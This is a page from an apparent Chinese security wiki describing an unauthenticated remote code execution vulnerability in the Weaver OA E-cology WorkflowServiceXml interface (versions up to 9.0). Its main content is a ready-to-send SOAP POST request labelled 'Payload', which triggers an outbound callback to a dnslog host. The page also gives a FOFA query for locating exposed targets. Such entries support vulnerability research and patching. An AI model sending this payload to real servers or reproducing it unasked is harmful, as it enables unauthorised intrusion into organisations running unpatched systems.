menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right --Vulnerability-main chevron_right 泛微OA E-cology WorkflowServiceXml 远程代码执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    泛微OA E-cology WorkflowServiceXml 远程代码执行漏洞.md
    1.36 KB / 2021-05-21 09:14:38
        # 泛微OA E-cology WorkflowServiceXml 远程代码执行漏洞
    
    泛微OA E-Cology以移动互联下的组织社交化转型需求为导向,采用轻前端重后端的设计思路,在前端面向用户提供个性化的办公平台,后端引擎帮助企业高效整合既有的IT资源生成符合用户需求的IT应用,帮助企业实现多种路径实现移动协同办公。WorkflowServiceXml接口可被未授权访问,攻击者调用该接口,可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行。
    
    影响版本:
    E-cology <= 9.0
    
    FOFA:`app="泛微-协同办公OA"`
    
    详情可以参考:https://www.anquanke.com/post/id/239865
    
    Payload:
    
    //<map>内容实体编码。
    
    ```
    POST /services%20/WorkflowServiceXml HTTP/1.1
    Host: 
    
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn">
           <soapenv:Header/>
           <soapenv:Body>
              <web:doCreateWorkflowRequest>    <web:string>
    <map>
      <entry>
        <url>http://nv0of7.dnslog.cn</url>
        <string>http://nv0of7.dnslog.cn</string>
      </entry>
    </map>
          </web:string>
                <web:string>2</web:string>
              </web:doCreateWorkflowRequest>
           </soapenv:Body>
        </soapenv:Envelope>
    ```
    
    ref:
    
    * https://nox.qianxin.com/vulnerability/detail/98398
    * https://www.anquanke.com/post/id/239865
    
    
    links
    file_download